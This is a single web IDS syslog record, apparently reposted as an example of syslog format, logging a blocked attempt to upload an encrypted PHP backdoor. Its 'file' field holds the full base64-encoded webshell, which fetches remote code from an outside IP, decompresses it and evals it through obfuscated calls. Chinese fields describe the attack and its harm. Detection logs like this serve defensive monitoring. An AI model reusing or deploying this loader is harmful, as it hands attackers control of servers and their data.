2019-08-15 17:50:46|!10.91.4.198|!webids-webshell_dolog|!{"file": "PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCnNlc3Npb25fc3RhcnQoKTsNCmhlYWRlcigiQ29 udGVudC10eXBlOnRleHQvaHRtbDtjaGFyc2V0PWdiayIpOw0KJHBhc3N3b3JkID0gInB1an llaDRpZmxpdWV2bSI7IA0KaWYoZW1wdHkoJF9TRVNTSU9OWydhcGkxMjM0J10pKSANCgkkX1 NFU1NJT05bJ2FwaTEyMzQnXT1maWxlX2dldF9jb250ZW50cyhzcHJpbnRmKCclcz8lcycscGF jaygiSCoiLCc2ODc0NzQ3MDNBMkYyRjMxMzIzMzJFMzEzMjM1MkUzMTMxMzQyRTM4MzIyRjZBN zg2NjYyNzU2MzZCNjU3NDMyMzAzMTM0MzEyRjY4NjE2MzZCMkYzMTJFNkE3MDY3JyksdW5pcWlkK CkpKTsNCmlmKHN0cmlwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdiYWlkdScpKzA9 PTApIGV4aXQ7DQppZihzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwnbXljY 3MnKSswPT0wKSBleGl0OwkNCigkYjRkYm95ID0gZ3p1bmNvbXByZXNzKCRfU0VTU0lPTlsnYXBpM TIzNCddKSkgJiYgQHByZWdfcmVwbGFjZSgnL2FkL2UnLCdAJy5zdHJfcm90MTMoJ3JpbnknKS4nKC RiNGRib3kpJywgJ2FkZCcpOw0KPz4=", "@timestamp": "2019-08-15T16:28:14.421+0800", "host_reraw": "171:8081.66.16.10","attack_result": "0", "victim": "10.16.66.171", "sport": 45299, "attack_type": "加密后门", "confidence": 80, "sip": "192.168.61.133", "severity": 8, "file_dir": "upload", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过安全性控制而获取对程序或 系统访问权的程序。该后门文件在调用>某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数, 比如base64_decode/create_function/chr等,具有后门的显著特征,可实现对服务器的操作和控制。", "serial_num": "QbJK/cNEg", "attack_harm": "服务器被植入后门程序后可能导致以下后果: 1.整个网站或者服务器被黑客控制,变成傀儡主机;2.核心数据被窃取,造成用户信息泄露。", "file_md5": "55c1a4fee7821c8689dc4fd895f593ed", "kill_chain": "0x02010000", "attacker": "192.168.61.133", "host": "10.16.66.171:8081", "@version": "6", "write_date": 1565857831, "attack_desc": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过>安全性控制而获取对程序或系统访问权的程序。 该后门文件在调用某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数,比如base64_decode/create_function/chr等, 具有后门的显著特征,可实现对>服务器的操作和控制。", "host_md5": "28713b58235ab268378f0af86cecaa64", "rule_name": "加密后门.B", "url": "/upload/upload.php", "dip": "10.16.66.171", "attack_flag": "true", "webrules_tag": "1", "attack_type_all": "攻击利用:16000000|webshell上传:161C0000", "dport": 8081, "victim_type": "server", "rule_id": 10027, "host_raw": "10.16.66.171:8081"}
以上是关于syslog格式说明的主要内容,如果未能解决你的问题,请参考以下文章